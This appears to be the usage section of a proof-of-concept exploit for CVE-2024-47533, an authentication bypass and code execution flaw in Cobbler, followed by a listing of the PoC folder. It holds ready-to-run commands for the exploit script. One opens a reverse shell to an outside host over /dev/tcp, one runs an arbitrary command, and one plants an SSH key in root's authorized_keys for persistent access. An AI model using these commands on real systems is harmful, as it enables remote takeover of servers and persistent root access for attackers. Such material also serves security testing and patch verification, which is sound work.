CVE-2024-47533: Cobbler Authentication Bypass & Code Execution```bash
# Reverse shell
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"'
# Simple command
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'id'
# Drop SSH key
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'mkdir -p /root/.ssh && echo ssh-ed25519 AAAA... >> /root/.ssh/authorized_keys'
```
[4.0K] /data/pocs/2845e1e485a719b728cb502343dcb97c67d0b2c6
├── [2.6K] CVE-2024-47533.py
└── [ 384] README.md
0 directories, 2 files